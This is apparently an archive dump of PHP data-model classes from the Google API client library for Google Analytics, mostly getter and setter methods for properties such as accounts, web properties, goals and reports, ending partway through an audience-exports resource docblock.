@var string */ public $updated; /** * @var string */ public $webPropertyId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param bool */ public function setActive($active) { $this->active = $active; } /** * @return bool */ public function getActive() { return $this->active; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param int */ public function setIndex($index) { $this->index = $index; } /** * @return int */ public function getIndex() { return $this->index; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setMaxValue($maxValue) { $this->maxValue = $maxValue; } /** * @return string */ public function getMaxValue() { return $this->maxValue; } /** * @param string */ public function setMinValue($minValue) { $this->minValue = $minValue; } /** * @return string */ public function getMinValue() { return $this->minValue; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param CustomMetricParentLink */ public function setParentLink(CustomMetricParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return CustomMetricParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomMetric::class, 'Google_Service_Analytics_CustomMetric'); google-api/vendor/google/apiclient-services/src/Analytics/Webproperty.php000064400000015003147600400120022673 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param WebpropertyChildLink */ public function setChildLink(WebpropertyChildLink $childLink) { $this->childLink = $childLink; } /** * @return WebpropertyChildLink */ public function getChildLink() { return $this->childLink; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param bool */ public function setDataRetentionResetOnNewActivity($dataRetentionResetOnNewActivity) { $this->dataRetentionResetOnNewActivity = $dataRetentionResetOnNewActivity; } /** * @return bool */ public function getDataRetentionResetOnNewActivity() { return $this->dataRetentionResetOnNewActivity; } /** * @param string */ public function setDataRetentionTtl($dataRetentionTtl) { $this->dataRetentionTtl = $dataRetentionTtl; } /** * @return string */ public function getDataRetentionTtl() { return $this->dataRetentionTtl; } /** * @param string */ public function setDefaultProfileId($defaultProfileId) { $this->defaultProfileId = $defaultProfileId; } /** * @return string */ public function getDefaultProfileId() { return $this->defaultProfileId; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setIndustryVertical($industryVertical) { $this->industryVertical = $industryVertical; } /** * @return string */ public function getIndustryVertical() { return $this->industryVertical; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setLevel($level) { $this->level = $level; } /** * @return string */ public function getLevel() { return $this->level; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param WebpropertyParentLink */ public function setParentLink(WebpropertyParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return WebpropertyParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param WebpropertyPermissions */ public function setPermissions(WebpropertyPermissions $permissions) { $this->permissions = $permissions; } /** * @return WebpropertyPermissions */ public function getPermissions() { return $this->permissions; } /** * @param int */ public function setProfileCount($profileCount) { $this->profileCount = $profileCount; } /** * @return int */ public function getProfileCount() { return $this->profileCount; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param bool */ public function setStarred($starred) { $this->starred = $starred; } /** * @return bool */ public function getStarred() { return $this->starred; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setWebsiteUrl($websiteUrl) { $this->websiteUrl = $websiteUrl; } /** * @return string */ public function getWebsiteUrl() { return $this->websiteUrl; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Webproperty::class, 'Google_Service_Analytics_Webproperty'); google-api/vendor/google/apiclient-services/src/Analytics/UnsampledReport.php000064400000015014147600400120023477 0ustar00 "end-date", "startDate" => "start-date", ]; /** * @var string */ public $accountId; /** * @var UnsampledReportCloudStorageDownloadDetails */ public $cloudStorageDownloadDetails; protected $cloudStorageDownloadDetailsType = UnsampledReportCloudStorageDownloadDetails::class; protected $cloudStorageDownloadDetailsDataType = ''; /** * @var string */ public $created; /** * @var string */ public $dimensions; /** * @var string */ public $downloadType; /** * @var UnsampledReportDriveDownloadDetails */ public $driveDownloadDetails; protected $driveDownloadDetailsType = UnsampledReportDriveDownloadDetails::class; protected $driveDownloadDetailsDataType = ''; /** * @var string */ public $endDate; /** * @var string */ public $filters; /** * @var string */ public $id; /** * @var string */ public $kind; /** * @var string */ public $metrics; /** * @var string */ public $profileId; /** * @var string */ public $segment; /** * @var string */ public $selfLink; /** * @var string */ public $startDate; /** * @var string */ public $status; /** * @var string */ public $title; /** * @var string */ public $updated; /** * @var string */ public $webPropertyId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param UnsampledReportCloudStorageDownloadDetails */ public function setCloudStorageDownloadDetails(UnsampledReportCloudStorageDownloadDetails $cloudStorageDownloadDetails) { $this->cloudStorageDownloadDetails = $cloudStorageDownloadDetails; } /** * @return UnsampledReportCloudStorageDownloadDetails */ public function getCloudStorageDownloadDetails() { return $this->cloudStorageDownloadDetails; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return string */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setDownloadType($downloadType) { $this->downloadType = $downloadType; } /** * @return string */ public function getDownloadType() { return $this->downloadType; } /** * @param UnsampledReportDriveDownloadDetails */ public function setDriveDownloadDetails(UnsampledReportDriveDownloadDetails $driveDownloadDetails) { $this->driveDownloadDetails = $driveDownloadDetails; } /** * @return UnsampledReportDriveDownloadDetails */ public function getDriveDownloadDetails() { return $this->driveDownloadDetails; } /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setFilters($filters) { $this->filters = $filters; } /** * @return string */ public function getFilters() { return $this->filters; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return string */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setProfileId($profileId) { $this->profileId = $profileId; } /** * @return string */ public function getProfileId() { return $this->profileId; } /** * @param string */ public function setSegment($segment) { $this->segment = $segment; } /** * @return string */ public function getSegment() { return $this->segment; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } /** * @param string */ public function setStatus($status) { $this->status = $status; } /** * @return string */ public function getStatus() { return $this->status; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UnsampledReport::class, 'Google_Service_Analytics_UnsampledReport'); google-api/vendor/google/apiclient-services/src/Analytics/AccountTreeRequest.php000064400000004712147600400120024143 0ustar00accountName = $accountName; } /** * @return string */ public function getAccountName() { return $this->accountName; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setProfileName($profileName) { $this->profileName = $profileName; } /** * @return string */ public function getProfileName() { return $this->profileName; } /** * @param string */ public function setTimezone($timezone) { $this->timezone = $timezone; } /** * @return string */ public function getTimezone() { return $this->timezone; } /** * @param string */ public function setWebpropertyName($webpropertyName) { $this->webpropertyName = $webpropertyName; } /** * @return string */ public function getWebpropertyName() { return $this->webpropertyName; } /** * @param string */ public function setWebsiteUrl($websiteUrl) { $this->websiteUrl = $websiteUrl; } /** * @return string */ public function getWebsiteUrl() { return $this->websiteUrl; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountTreeRequest::class, 'Google_Service_Analytics_AccountTreeRequest'); google-api/vendor/google/apiclient-services/src/Analytics/ProfileFilterLink.php000064400000004771147600400120023747 0ustar00filterRef = $filterRef; } /** * @return FilterRef */ public function getFilterRef() { return $this->filterRef; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param ProfileRef */ public function setProfileRef(ProfileRef $profileRef) { $this->profileRef = $profileRef; } /** * @return ProfileRef */ public function getProfileRef() { return $this->profileRef; } /** * @param int */ public function setRank($rank) { $this->rank = $rank; } /** * @return int */ public function getRank() { return $this->rank; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfileFilterLink::class, 'Google_Service_Analytics_ProfileFilterLink'); google-api/vendor/google/apiclient-services/src/Analytics/WebPropertySummary.php000064400000006027147600400120024217 0ustar00id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setLevel($level) { $this->level = $level; } /** * @return string */ public function getLevel() { return $this->level; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param ProfileSummary[] */ public function setProfiles($profiles) { $this->profiles = $profiles; } /** * @return ProfileSummary[] */ public function getProfiles() { return $this->profiles; } /** * @param bool */ public function setStarred($starred) { $this->starred = $starred; } /** * @return bool */ public function getStarred() { return $this->starred; } /** * @param string */ public function setWebsiteUrl($websiteUrl) { $this->websiteUrl = $websiteUrl; } /** * @return string */ public function getWebsiteUrl() { return $this->websiteUrl; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(WebPropertySummary::class, 'Google_Service_Analytics_WebPropertySummary'); google-api/vendor/google/apiclient-services/src/Analytics/Upload.php000064400000005213147600400120021577 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setCustomDataSourceId($customDataSourceId) { $this->customDataSourceId = $customDataSourceId; } /** * @return string */ public function getCustomDataSourceId() { return $this->customDataSourceId; } /** * @param string[] */ public function setErrors($errors) { $this->errors = $errors; } /** * @return string[] */ public function getErrors() { return $this->errors; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setStatus($status) { $this->status = $status; } /** * @return string */ public function getStatus() { return $this->status; } /** * @param string */ public function setUploadTime($uploadTime) { $this->uploadTime = $uploadTime; } /** * @return string */ public function getUploadTime() { return $this->uploadTime; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Upload::class, 'Google_Service_Analytics_Upload'); google-api/vendor/google/apiclient-services/src/Analytics/AccountTicket.php000064400000005153147600400120023116 0ustar00account = $account; } /** * @return Account */ public function getAccount() { return $this->account; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param Profile */ public function setProfile(Profile $profile) { $this->profile = $profile; } /** * @return Profile */ public function getProfile() { return $this->profile; } /** * @param string */ public function setRedirectUri($redirectUri) { $this->redirectUri = $redirectUri; } /** * @return string */ public function getRedirectUri() { return $this->redirectUri; } /** * @param Webproperty */ public function setWebproperty(Webproperty $webproperty) { $this->webproperty = $webproperty; } /** * @return Webproperty */ public function getWebproperty() { return $this->webproperty; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountTicket::class, 'Google_Service_Analytics_AccountTicket'); google-api/vendor/google/apiclient-services/src/Analytics/Accounts.php000064400000006005147600400120022132 0ustar00items = $items; } /** * @return Account[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Accounts::class, 'Google_Service_Analytics_Accounts'); google-api/vendor/google/apiclient-services/src/Analytics/McfDataProfileInfo.php000064400000005027147600400120024012 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setProfileId($profileId) { $this->profileId = $profileId; } /** * @return string */ public function getProfileId() { return $this->profileId; } /** * @param string */ public function setProfileName($profileName) { $this->profileName = $profileName; } /** * @return string */ public function getProfileName() { return $this->profileName; } /** * @param string */ public function setTableId($tableId) { $this->tableId = $tableId; } /** * @return string */ public function getTableId() { return $this->tableId; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(McfDataProfileInfo::class, 'Google_Service_Analytics_McfDataProfileInfo'); google-api/vendor/google/apiclient-services/src/Analytics/ExperimentVariations.php000064400000003635147600400120024541 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setStatus($status) { $this->status = $status; } /** * @return string */ public function getStatus() { return $this->status; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } public function setWeight($weight) { $this->weight = $weight; } public function getWeight() { return $this->weight; } /** * @param bool */ public function setWon($won) { $this->won = $won; } /** * @return bool */ public function getWon() { return $this->won; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ExperimentVariations::class, 'Google_Service_Analytics_ExperimentVariations'); google-api/vendor/google/apiclient-services/src/Analytics/Segment.php000064400000005767147600400120021773 0ustar00created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setDefinition($definition) { $this->definition = $definition; } /** * @return string */ public function getDefinition() { return $this->definition; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setSegmentId($segmentId) { $this->segmentId = $segmentId; } /** * @return string */ public function getSegmentId() { return $this->segmentId; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Segment::class, 'Google_Service_Analytics_Segment'); google-api/vendor/google/apiclient-services/src/Analytics/Uploads.php000064400000005370147600400120021766 0ustar00items = $items; } /** * @return Upload[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Uploads::class, 'Google_Service_Analytics_Uploads'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDimension.php000064400000007722147600400120023502 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param bool */ public function setActive($active) { $this->active = $active; } /** * @return bool */ public function getActive() { return $this->active; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param int */ public function setIndex($index) { $this->index = $index; } /** * @return int */ public function getIndex() { return $this->index; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param CustomDimensionParentLink */ public function setParentLink(CustomDimensionParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return CustomDimensionParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDimension::class, 'Google_Service_Analytics_CustomDimension'); google-api/vendor/google/apiclient-services/src/Analytics/EntityUserLink.php000064400000005327147600400120023312 0ustar00entity = $entity; } /** * @return EntityUserLinkEntity */ public function getEntity() { return $this->entity; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param EntityUserLinkPermissions */ public function setPermissions(EntityUserLinkPermissions $permissions) { $this->permissions = $permissions; } /** * @return EntityUserLinkPermissions */ public function getPermissions() { return $this->permissions; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param UserRef */ public function setUserRef(UserRef $userRef) { $this->userRef = $userRef; } /** * @return UserRef */ public function getUserRef() { return $this->userRef; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityUserLink::class, 'Google_Service_Analytics_EntityUserLink'); google-api/vendor/google/apiclient-services/src/Analytics/GoalParentLink.php000064400000002441147600400120023225 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalParentLink::class, 'Google_Service_Analytics_GoalParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/LinkedForeignAccount.php000064400000007165147600400120024420 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param bool */ public function setEligibleForSearch($eligibleForSearch) { $this->eligibleForSearch = $eligibleForSearch; } /** * @return bool */ public function getEligibleForSearch() { return $this->eligibleForSearch; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setLinkedAccountId($linkedAccountId) { $this->linkedAccountId = $linkedAccountId; } /** * @return string */ public function getLinkedAccountId() { return $this->linkedAccountId; } /** * @param string */ public function setRemarketingAudienceId($remarketingAudienceId) { $this->remarketingAudienceId = $remarketingAudienceId; } /** * @return string */ public function getRemarketingAudienceId() { return $this->remarketingAudienceId; } /** * @param string */ public function setStatus($status) { $this->status = $status; } /** * @return string */ public function getStatus() { return $this->status; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(LinkedForeignAccount::class, 'Google_Service_Analytics_LinkedForeignAccount'); google-api/vendor/google/apiclient-services/src/Analytics/ProfilePermissions.php000064400000002234147600400120024207 0ustar00effective = $effective; } /** * @return string[] */ public function getEffective() { return $this->effective; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfilePermissions::class, 'Google_Service_Analytics_ProfilePermissions'); google-api/vendor/google/apiclient-services/src/Analytics/Goals.php000064400000005760147600400120021427 0ustar00items = $items; } /** * @return Goal[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Goals::class, 'Google_Service_Analytics_Goals'); google-api/vendor/google/apiclient-services/src/Analytics/WebpropertyParentLink.php000064400000002466147600400120024674 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(WebpropertyParentLink::class, 'Google_Service_Analytics_WebpropertyParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/FilterParentLink.php000064400000002447147600400120023576 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterParentLink::class, 'Google_Service_Analytics_FilterParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/HashClientIdRequest.php000064400000003165147600400120024227 0ustar00clientId = $clientId; } /** * @return string */ public function getClientId() { return $this->clientId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(HashClientIdRequest::class, 'Google_Service_Analytics_HashClientIdRequest'); google-api/vendor/google/apiclient-services/src/Analytics/GoalVisitNumPagesDetails.php000064400000002722147600400120025224 0ustar00comparisonType = $comparisonType; } /** * @return string */ public function getComparisonType() { return $this->comparisonType; } /** * @param string */ public function setComparisonValue($comparisonValue) { $this->comparisonValue = $comparisonValue; } /** * @return string */ public function getComparisonValue() { return $this->comparisonValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalVisitNumPagesDetails::class, 'Google_Service_Analytics_GoalVisitNumPagesDetails'); google-api/vendor/google/apiclient-services/src/Analytics/FilterUppercaseDetails.php000064400000002541147600400120024757 0ustar00field = $field; } /** * @return string */ public function getField() { return $this->field; } /** * @param int */ public function setFieldIndex($fieldIndex) { $this->fieldIndex = $fieldIndex; } /** * @return int */ public function getFieldIndex() { return $this->fieldIndex; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterUppercaseDetails::class, 'Google_Service_Analytics_FilterUppercaseDetails'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDataSource.php000064400000012575147600400120023611 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param CustomDataSourceChildLink */ public function setChildLink(CustomDataSourceChildLink $childLink) { $this->childLink = $childLink; } /** * @return CustomDataSourceChildLink */ public function getChildLink() { return $this->childLink; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setImportBehavior($importBehavior) { $this->importBehavior = $importBehavior; } /** * @return string */ public function getImportBehavior() { return $this->importBehavior; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param CustomDataSourceParentLink */ public function setParentLink(CustomDataSourceParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return CustomDataSourceParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param string[] */ public function setProfilesLinked($profilesLinked) { $this->profilesLinked = $profilesLinked; } /** * @return string[] */ public function getProfilesLinked() { return $this->profilesLinked; } /** * @param string[] */ public function setSchema($schema) { $this->schema = $schema; } /** * @return string[] */ public function getSchema() { return $this->schema; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setUploadType($uploadType) { $this->uploadType = $uploadType; } /** * @return string */ public function getUploadType() { return $this->uploadType; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDataSource::class, 'Google_Service_Analytics_CustomDataSource'); google-api/vendor/google/apiclient-services/src/AnalyticsData/Resource/PropertiesAudienceExports.php000064400000020023147600400120030107 0ustar00 * $analyticsdataService = new Google\Service\AnalyticsData(...); * $audienceExports = $analyticsdataService->properties_audienceExports; * */ class PropertiesAudienceExports extends \Google\Service\Resource { /** * Creates an audience export for later retrieval. This method quickly returns * the audience export's resource name and initiates a long running asynchronous * request to form an audience export. To export the users in an audience * export, first create the audience export through this method and then send * the audience resource name to the `QueryAudienceExport` method. See [Creating * an Audience Export](https://developers.google.com/analytics/devguides/reporti * ng/data/v1/audience-list-basics) for an introduction to Audience Exports with * examples. An audience export is a snapshot of the users currently in the * audience at the time of audience export creation. Creating audience exports * for one audience on different days will return different results as users * enter and exit the audience. Audiences in Google Analytics 4 allow you to * segment your users in the ways that are important to your business. To learn * more, see https://support.google.com/analytics/answer/9267572. Audience * exports contain the users in each audience. Audience Export APIs have some * methods at alpha and other methods 